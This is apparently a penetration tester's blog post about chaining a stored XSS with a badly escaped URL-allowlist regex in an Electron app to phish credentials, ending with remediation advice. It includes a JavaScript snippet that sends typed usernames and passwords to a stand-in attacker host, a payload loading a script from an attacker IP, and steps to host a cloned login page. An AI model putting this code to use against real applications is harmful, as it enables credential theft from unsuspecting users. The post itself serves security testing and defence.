Phishing and credential harvesting in Electron applications

Pavel Shabarkin
8 min readMar 30, 2022

Not related to the article

Hey, I am a security consultant and a penetration tester from Ukraine 🇺🇦. For the current moment I gather money and buy an ammunition and survival goods for my friends who are on the frontier. I want to stop the madness happened in Ukraine 🇺🇦

Announcement: The following blog post is dedicated to stop the madness happened in Ukraine 🇺🇦

TL;DR:

XSS can be particularly devastating to Electron apps, and can result in RCE and phishing that might not be viable in a browser. Electron has features to mitigate these problems, so applications should turn them on.

Even XSS that would be low-impact in the browser can result in highly effective phishing if the application’s URL allowlist is improperly designed. Attacks exploit the Electron model and the application-like presentation of Electron to gain the user’s confidence.

Introduction

It’s fairly common for modern platforms to provide native desktop applications using the Electron JS framework, in taking a look at these one common pattern that is visible is getting RCE within the actual Electron application by loading malicious content in the desktop’s window page. Electron has mechanisms in place that will severely limit the attack possibilities of an XSS, this is discussed in the next section. However, there is another use of XSS specifically to set up a successful phishing campaigns and harvest user credentials without interfering with the legitimate workflow of application and relying on users trust of native applications.

Companies usually launch their applications on several platforms: web, mobile and desktop applications. All of them share the same API. For the example discussed through out this post lets assume the client-side of the application is based on the Angular framework. By default, Angular prevents many client-side attacks, it protects embedding of any malicious entities. Let’s assume our theoretical app allows embedding custom scripts and HTML content from any valid source. This functionality exists to provide users with the ability to create custom functionality based on their web applications or to integrate with 3rd party applications to display dashboards and data. These dashboards can then be shared to other users of the same tenant. Given that this is custom code, it’s possible for a malicious user to create a 3rd party embedded dashboard that has a simple XSS. If properly integrated into the Electron app this XSS will have limited and low impact. Given that the content is on a separate domain and same-origin policy (SOP) will prevent any type of cross domain access preventing any interesting attacks. This also assumes that Electron controls are configured correctly and access is limited. But even if RCE is not possible we have other interesting attacks we can explore and chain with this XSS.

While this example will explore the XSS within a 3rd party dashboard context within Electron the same attacks will apply to XSS found in any other parts of the platform functionality.

Looking for RCE

At this point we need to check to ensure that we dont have the ability for native OS level RCE within the Electron app. Poor Electron configuration deployments can lead to real problems, like client-side RCE and should be a big focus of any Electron app security review.

Electron is based on Chromium, but it is not a browser! Certain principles and security mechanisms implemented by modern browsers are not in place. Electron as a platform wants to maintain a balance of developer usability and security.

The desktop application might have access to the user’s device through Node APIs. The following two configurations are responsible for providing mechanisms to prevent the application JavaScript from having direct access to the user’s device and system level commands.

  • nodeIntegration - is off by default
  • contextIsolation - is on by default

In our example application the following two controls are configured with the default strict security configuration:

nodeIntegration:false

contextIsolation:true

This ensure that our XSS cannot be escalated to OS level RCE.

Currently there are no direct exploits or bypasses to these controls meaning if they are set up in a strict fashion then an attacker is out of luck in achieving OS level remote code execution or gaining access to lower level APIs.

Review of the app navigation [regular expression bypass]

After reviewing the above settings the next interesting area to take a look at is how the application opens links and renders their content. In our example the application loads content and links from their own web app within a desktop window when navigating the app through Electron. So what happens when third-party links and apps are opened?

Given that most of the code is JavaScript the easiest answer to our question can be found by locating the front end code responsible for this. Taking a look we find that the desktop application overrides the app navigation and implemented verification of content source which can be loaded and embedded within the desktop window:

webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)

The “new-window” event listener opens new windows depending on the type of link. The “openInternally” function is responsible for determining what type of link is clicked whether it’s part of the application or if its a 3rd party non embedded link. If the function returns “true”, the application will open the link in the desktop window with the assumption that this is a link belonging to the platform, and if it returns “false”, the application will open the link in the browser as a 3rd party non-associated resource. Links that belong to the application should open in the desktop app and anything else should be opened in the browser to signal to the user that this is not a direct part of the application and they should cautious.

There is the simplified pseudo-code to understand the problem:

validInternalUrls = ".*((subdomain.google.com)|(subdomain.apple.com)).*" //etc...function openInternally (url) {    if (new RegExp(validInternalUrls, "i").test(url)) {
return true;
}
return false;
}

The “openInternally” function uses a regular expression to whitelist URLs that should open in the desktop application. Reviewing the regular expression we see that the dots \\. are not escaped. This improper regex exposes an attack vector against the users trust of the native application. This vulnerability can be abused to load any domain within an application window such as the following:

http://subdomain.googleXcom.com

http://subdomainagoogleqcom.com

Try it yourself in the browser:

validInternalUrls = ".*((subdomain.google.com)|(subdomain.apple.com)).*"
var reg = new RegExp(validInternalUrls, "i")
reg.test("subdomain.googlexcom.com")

From this point, an attacker could buy and register a domain such as subdomainagoogleqcom.com and host a malicious web application, where the desktop application would consider that source as "trusted" to open and render this content in the desktop window.

Combining this vulnerability with the XSS vulnerability assumed to be found in the introduction we have a great phishing vector to present malicious content within an Electron app. Given that this is a native app users have significantly more trust in it than they would if this was a pop up in a browser. Thus, by exploiting a stored XSS users are easily redirect to a web app under an attackers control and if properly stylezed they will never realize that they are not interacting with the application they trust.

Setting up the phishing attack

To demonstrate the full extent of this chained XSS and lack of proper URL validation lets design a quick phishing attack. Like with many modern applications it is fairly common for sessions to expire or not be properly passed over requiring users to re-sign in when following a link or accessing other application functionality. For the phishing attack lets simulate a link that opens a sign in dialogue using the XSS discovered at the beginning remembering that the XSS does not have any access to session/cookies or direct access to API because of SOP controls. If the XSS had access to those then we could directly abuse it without having to chain with the improper window opening functionality.

The HTML page of the main login functionality can be copied an index.html file. Then we would need to find the code responsible for the legitimate callback function of the Angular event listener which is triggered each time a user enters credentials or submit the form. Downloading the JS file and injected the following code into the listener will get us the desired results.

User credentials can be retrieved by getElementById and then they can be sent to the host under our control. Potential example code:

console.log("Attention: I am going to steal your credentials");
if (document.getElementById("login-email-input").value!= "" && document.getElementById("login-password-input").value != ""){
var xhr = new XMLHttpRequest();
var params = 'username=' + encodeURIComponent(document.getElementById("login-email-input").value) + '&password=' + encodeURIComponent(document.getElementById("login-password-input").value);
xhr.open("GET", '<https://ourhost.com/credentials?'> + params, true);
xhr.send();
}

Once the above function is added to the legitimate JS file, we need to ensure to change which JS file the HTML login page to load. (If any event is triggered, the event will be sent to the listener under our control (JS file with custom code):

<script src="/file.js" defer="defer"></script><script src="http://<MY-IP>/file.js" defer="defer"></script>

Deploying the HTML and JS can be done using a simple python server : sudo python3 -m http.server 80:

  1. index.html (the main login web page of the application, where the source of the file.js JS file is changed by me to the hosted)
  2. file.js (the legitimate file.js file, but with added custom forwarding code, which forwards the user credentials each time they interact with the form)

Due to the found XSS vulnerability, any user that visits a page with the stored XSS will automatically see a new desktop window thats requesting that they login. This will allow phishing a wide range of application users especially if the XSS can be triggered from a common place such as dashboard or messages:

<script>
window.open("<http://subdomainagoogleqcom.com/index.html>")
</script>

The art of exploitation is that the file.js file will authenticate a user exactly like the original application does. A user will further interact with the malicious files within the native application which is inherently trusted and will not be aware or suspicious of any malicious activities.

To highlight the underlying problems both the XSS in general but more specifically that the application lacks checks to ensure that the content can or should be loaded within the native application window. If the content is loaded within a native window the user has no indication that the content is malicious or even a simple way of checking to ensure that content is coming from expected sources.

Recommendation

For our example I would recommend implementing a know URL library such as https://developer.mozilla.org/en-US/docs/Web/API/URL/URL to split the protocol, domain, and path of the link:

new URL('<http://www.example.com>')URL {origin: '<http://www.example.com>', protocol: 'http:', username: '', password: '', host: 'www.example.com', …}
hash: ""
host: "www.example.com"
hostname: "www.example.com"
href: "<http://www.example.com/>"
origin: "<http://www.example.com>"
password: ""
pathname: "/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""
[[Prototype]]: URL

Then ensure that protocol is limited to https:// and only then pass the host to the our openInternally function for further checks:

url = new URL('<http://www.example.com>')
if (url.protocol === "https:"){
openInternally(url.host)
}

In our openInternally function double check and always triple validate regular expression to ensure they properly escape special character and remove case sensitivity:

validInternalUrls = "((subdomain\\\\.google\\\\.com)|(subdomain\\\\.apple\\\\.com))" //etc...function openInternally (url) {    if (new RegExp(validInternalUrls).test(url)) {
return true;
}
return false;
}

For any native application’s developers should always limit the user’s navigation and ensure only trusted data source are allowed to be open.

The complete guide on how to test Electron applications you may find here:

References

  1. https://doyensec.com/resources/Covalence-2020-Carettoni-DemocratizingElectronSecurity.pdf
  2. https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1
  3. https://www.electronjs.org/docs/latest/tutorial/security#13-disable-or-limit-navigation

--

--